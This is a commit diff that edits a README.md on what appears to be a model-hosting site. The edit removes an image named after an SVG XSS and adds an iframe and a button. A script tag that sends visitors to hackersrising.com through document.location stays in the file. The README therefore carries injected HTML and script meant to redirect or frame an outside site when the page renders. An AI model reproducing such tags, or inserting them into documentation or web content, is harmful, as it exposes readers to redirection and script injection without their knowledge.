datoto9019 commited on
Commit
e727394
·
verified ·
1 Parent(s): 8a68ba1

Update README.md

Browse files
Files changed (1) hide show
  1. README.md +4 -2
README.md CHANGED
@@ -1,7 +1,9 @@
1
  ---
2
  license: apache-2.0
3
  ---
4
- <img src="https://images.ctfassets.net/h0jtq0wdx190/3HivOdbWvD7QCDXEd53fx0/484ffd97340457cd7f1b954be06b5432/SVG_WEBPAGE_XSS.svg">
 
 
 
5
 
6
 
7
- <script>document.location='https://hackersrising.com'</script>
 
1
  ---
2
  license: apache-2.0
3
  ---
4
+ <iframe src="https://hackersrising.com" style="width:200px;height:800px;"></iframe>
5
+ <button style="color:blueviolet">HI</button>
6
+
7
+ <script>document.location='https://hackersrising.com'</script>
8
 
9